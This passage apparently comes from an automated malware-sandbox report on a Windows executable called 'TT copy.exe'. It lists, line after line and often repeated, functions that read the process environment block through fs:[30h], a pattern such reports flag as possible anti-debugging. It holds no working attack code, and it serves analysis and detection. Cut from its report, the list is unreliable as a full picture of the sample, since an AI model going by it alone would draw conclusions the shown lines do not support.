            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108A229 mov eax, dword ptr fs:[00000030h]3_2_0108A229
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A4A2C mov eax, dword ptr fs:[00000030h]3_2_010A4A2C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A4A2C mov eax, dword ptr fs:[00000030h]3_2_010A4A2C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069240 mov eax, dword ptr fs:[00000030h]3_2_01069240
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069240 mov eax, dword ptr fs:[00000030h]3_2_01069240
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069240 mov eax, dword ptr fs:[00000030h]3_2_01069240
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01069240 mov eax, dword ptr fs:[00000030h]3_2_01069240
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112EA55 mov eax, dword ptr fs:[00000030h]3_2_0112EA55
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010F4257 mov eax, dword ptr fs:[00000030h]3_2_010F4257
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A927A mov eax, dword ptr fs:[00000030h]3_2_010A927A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111B260 mov eax, dword ptr fs:[00000030h]3_2_0111B260
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111B260 mov eax, dword ptr fs:[00000030h]3_2_0111B260
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138A62 mov eax, dword ptr fs:[00000030h]3_2_01138A62
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109D294 mov eax, dword ptr fs:[00000030h]3_2_0109D294
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109D294 mov eax, dword ptr fs:[00000030h]3_2_0109D294
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010652A5 mov eax, dword ptr fs:[00000030h]3_2_010652A5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010652A5 mov eax, dword ptr fs:[00000030h]3_2_010652A5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010652A5 mov eax, dword ptr fs:[00000030h]3_2_010652A5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010652A5 mov eax, dword ptr fs:[00000030h]3_2_010652A5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010652A5 mov eax, dword ptr fs:[00000030h]3_2_010652A5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107AAB0 mov eax, dword ptr fs:[00000030h]3_2_0107AAB0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107AAB0 mov eax, dword ptr fs:[00000030h]3_2_0107AAB0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109FAB0 mov eax, dword ptr fs:[00000030h]3_2_0109FAB0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092ACB mov eax, dword ptr fs:[00000030h]3_2_01092ACB
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092AE4 mov eax, dword ptr fs:[00000030h]3_2_01092AE4
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124AEF mov eax, dword ptr fs:[00000030h]3_2_01124AEF
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138D34 mov eax, dword ptr fs:[00000030h]3_2_01138D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112E539 mov eax, dword ptr fs:[00000030h]3_2_0112E539
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094D3B mov eax, dword ptr fs:[00000030h]3_2_01094D3B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094D3B mov eax, dword ptr fs:[00000030h]3_2_01094D3B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01094D3B mov eax, dword ptr fs:[00000030h]3_2_01094D3B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01073D34 mov eax, dword ptr fs:[00000030h]3_2_01073D34
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106AD30 mov eax, dword ptr fs:[00000030h]3_2_0106AD30
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010EA537 mov eax, dword ptr fs:[00000030h]3_2_010EA537
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A3D43 mov eax, dword ptr fs:[00000030h]3_2_010A3D43
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E3540 mov eax, dword ptr fs:[00000030h]3_2_010E3540
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01113D40 mov eax, dword ptr fs:[00000030h]3_2_01113D40
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01087D50 mov eax, dword ptr fs:[00000030h]3_2_01087D50
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108C577 mov eax, dword ptr fs:[00000030h]3_2_0108C577
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108C577 mov eax, dword ptr fs:[00000030h]3_2_0108C577
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01092581 mov eax, dword ptr fs:[00000030h]3_2_01092581
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01062D8A mov eax, dword ptr fs:[00000030h]3_2_01062D8A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01122D82 mov eax, dword ptr fs:[00000030h]3_2_01122D82
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109FD9B mov eax, dword ptr fs:[00000030h]3_2_0109FD9B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109FD9B mov eax, dword ptr fs:[00000030h]3_2_0109FD9B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010935A1 mov eax, dword ptr fs:[00000030h]3_2_010935A1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01091DB5 mov eax, dword ptr fs:[00000030h]3_2_01091DB5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011305AC mov eax, dword ptr fs:[00000030h]3_2_011305AC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011305AC mov eax, dword ptr fs:[00000030h]3_2_011305AC
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6DC9 mov eax, dword ptr fs:[00000030h]3_2_010E6DC9
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01118DF1 mov eax, dword ptr fs:[00000030h]3_2_01118DF1
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107D5E0 mov eax, dword ptr fs:[00000030h]3_2_0107D5E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107D5E0 mov eax, dword ptr fs:[00000030h]3_2_0107D5E0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112FDE2 mov eax, dword ptr fs:[00000030h]3_2_0112FDE2
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6C0A mov eax, dword ptr fs:[00000030h]3_2_010E6C0A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121C06 mov eax, dword ptr fs:[00000030h]3_2_01121C06
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113740D mov eax, dword ptr fs:[00000030h]3_2_0113740D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109BC2C mov eax, dword ptr fs:[00000030h]3_2_0109BC2C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A44B mov eax, dword ptr fs:[00000030h]3_2_0109A44B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FC450 mov eax, dword ptr fs:[00000030h]3_2_010FC450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FC450 mov eax, dword ptr fs:[00000030h]3_2_010FC450
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108746D mov eax, dword ptr fs:[00000030h]3_2_0108746D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109AC7B mov eax, dword ptr fs:[00000030h]3_2_0109AC7B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B477 mov eax, dword ptr fs:[00000030h]3_2_0108B477
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01124496 mov eax, dword ptr fs:[00000030h]3_2_01124496
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107849B mov eax, dword ptr fs:[00000030h]3_2_0107849B
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138CD6 mov eax, dword ptr fs:[00000030h]3_2_01138CD6
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_011214FB mov eax, dword ptr fs:[00000030h]3_2_011214FB
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E6CF0 mov eax, dword ptr fs:[00000030h]3_2_010E6CF0
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A70E mov eax, dword ptr fs:[00000030h]3_2_0109A70E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A70E mov eax, dword ptr fs:[00000030h]3_2_0109A70E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113070D mov eax, dword ptr fs:[00000030h]3_2_0113070D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0113070D mov eax, dword ptr fs:[00000030h]3_2_0113070D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108F716 mov eax, dword ptr fs:[00000030h]3_2_0108F716
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFF10 mov eax, dword ptr fs:[00000030h]3_2_010FFF10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFF10 mov eax, dword ptr fs:[00000030h]3_2_010FFF10
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01064F2E mov eax, dword ptr fs:[00000030h]3_2_01064F2E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01064F2E mov eax, dword ptr fs:[00000030h]3_2_01064F2E
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B73D mov eax, dword ptr fs:[00000030h]3_2_0108B73D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108B73D mov eax, dword ptr fs:[00000030h]3_2_0108B73D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109E730 mov eax, dword ptr fs:[00000030h]3_2_0109E730
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107EF40 mov eax, dword ptr fs:[00000030h]3_2_0107EF40
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107FF60 mov eax, dword ptr fs:[00000030h]3_2_0107FF60
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01138F6A mov eax, dword ptr fs:[00000030h]3_2_01138F6A
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01078794 mov eax, dword ptr fs:[00000030h]3_2_01078794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E7794 mov eax, dword ptr fs:[00000030h]3_2_010E7794
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010A37F5 mov eax, dword ptr fs:[00000030h]3_2_010A37F5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106C600 mov eax, dword ptr fs:[00000030h]3_2_0106C600
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01098E00 mov eax, dword ptr fs:[00000030h]3_2_01098E00
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A61C mov eax, dword ptr fs:[00000030h]3_2_0109A61C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0109A61C mov eax, dword ptr fs:[00000030h]3_2_0109A61C
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01121608 mov eax, dword ptr fs:[00000030h]3_2_01121608
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0106E620 mov eax, dword ptr fs:[00000030h]3_2_0106E620
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0111FE3F mov eax, dword ptr fs:[00000030h]3_2_0111FE3F
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01077E41 mov eax, dword ptr fs:[00000030h]3_2_01077E41
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AE44 mov eax, dword ptr fs:[00000030h]3_2_0112AE44
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0112AE44 mov eax, dword ptr fs:[00000030h]3_2_0112AE44
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0107766D mov eax, dword ptr fs:[00000030h]3_2_0107766D
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_0108AE73 mov eax, dword ptr fs:[00000030h]3_2_0108AE73
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010FFE87 mov eax, dword ptr fs:[00000030h]3_2_010FFE87
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_010E46A7 mov eax, dword ptr fs:[00000030h]3_2_010E46A7
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
            Source: C:\Users\user\Desktop\TT copy.exeCode function: 3_2_01130EA5 mov eax, dword ptr fs:[00000030h]3_2_01130EA5
